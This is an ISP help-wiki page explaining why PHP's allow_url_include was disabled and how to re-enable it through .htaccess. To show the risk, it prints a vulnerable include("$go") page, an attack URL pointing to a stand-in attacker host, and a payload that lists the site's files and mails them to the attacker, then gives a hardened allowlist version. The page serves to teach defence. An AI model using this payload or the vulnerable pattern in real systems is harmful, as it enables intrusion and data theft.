Allow url include

From SonicWiki

allow_url_include

For security reasons, Sonic.net has disabled the ability to include remote files with PHP's include() function (the allow_url_include directive is now off). This was done to protect our users' data, but some customers may need to make additional changes for their websites to keep working correctly.

1. Background and explanation

Before we made this change, it was possible to execute code like this on our servers:

<?php include("http://www.foo.com/bar.txt"); ?>

This would fetch the file "bar.txt" from the external host "www.foo.com", and anything inside that file would run as PHP code on the customer's website. The above example can be useful, but the same mechanism can also be used to execute malicious code.

An example exploit:

Source code of the customer's index.php page:

<?php
echo "<html>\n";
echo " <body>\n";
// $go is taken straight from the request (via register_globals, so ?go=... sets it)
include("$go");
echo " </body>\n";
echo "</html>\n";
?>

In cases like this, the URL can be modified to include an additional file:

http://www.mycoolsite.com/index.php?go=page1.php

The customer's index.php file would include the file page1.php, executing the PHP code and displaying its output on screen.

A more alarming example of this same exploit is listed below. In this case, the hacker supplies a remote URL in the customer's $go variable, and the server fetches and executes that file:

http://www.mycoolsite.com/index.php?go=http://www.evilhackersrock.net/commands.txt

commands.txt includes this code:

<?php
$site = system("hostname");
$files = system("find ./");
$output = $files; $output .= "\n\n";
mail("l337hax0r@evilhackersrock.net", "My Victim: $site", $output);
?>

So what happened here?

The hacker called his or her file via the customer's $go variable. The file contained commands to get the name of the server and to list all of the customer's files. Since the hacker now knows the names of all the customer's files, he or she can modify commands.txt to examine each file and look for the customer's password or other sensitive information.
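The safe way to write the index.php shown above is to never pass request data to include() at all. The following is an added example (not code from the SonicWiki page or from Sonic.net) of the vulnerable pattern replaced by an allowlist; the page names, $allowedPages and safe_page_path() are assumptions.

```php
<?php
// Added example: hardened replacement for include("$go").
// Names ($allowedPages, safe_page_path, pages/*.php) are assumptions.

// Map the request parameter to a fixed set of local files. The user input
// is only ever used as an array key, so a URL (http://...), a stream
// wrapper (php://, data://) or "../" can never reach include().
$allowedPages = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

// Returns the absolute path of the page to include, or null if the
// request is not one of the allowed keys.
function safe_page_path(string $go, array $allowed, string $baseDir): ?string
{
    if (!array_key_exists($go, $allowed)) {
        return null;
    }
    $path = realpath($baseDir . '/' . $allowed[$go]);
    // Defence in depth: the resolved file must still live under $baseDir.
    if ($path === false || strpos($path, realpath($baseDir) . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// A site that does not need remote includes can log loudly if the
// directive was switched back on (for example through .htaccess).
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is enabled but this site does not require it');
}

$go   = $_GET['go'] ?? 'home';   // no register_globals: read the parameter explicitly
$path = safe_page_path($go, $allowedPages, __DIR__);

echo "<html>\n";
echo " <body>\n";
if ($path === null) {
    http_response_code(404);
    echo "Unknown page\n";
} else {
    include $path;
}
echo " </body>\n";
echo "</html>\n";
```

With this structure the site works the same whether allow_url_include is on or off, so the work-around in section 2 is not needed.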

Why are we doing this?

Hackers have used methods like this to send spam, install phishing sites, and carry out other malicious acts for some time now. Popular software packages like Joomla, Gallery, phpBB and WordPress have a history of being vulnerable to these kinds of attacks. Someone who installs these programs is not warned about these vulnerabilities and ultimately pays the price. By making these changes, we are helping to protect our customers and their data.

2. Work-around

If you are confident that you are using these functions in a responsible manner, you can re-enable remote includes for your website. You will need to create a .htaccess file in your root web directory. In the .htaccess file, add a line that looks like this:

php_flag allow_url_include on

There are other options you can set inside the .htaccess file. For more information please see our htaccess FAQ.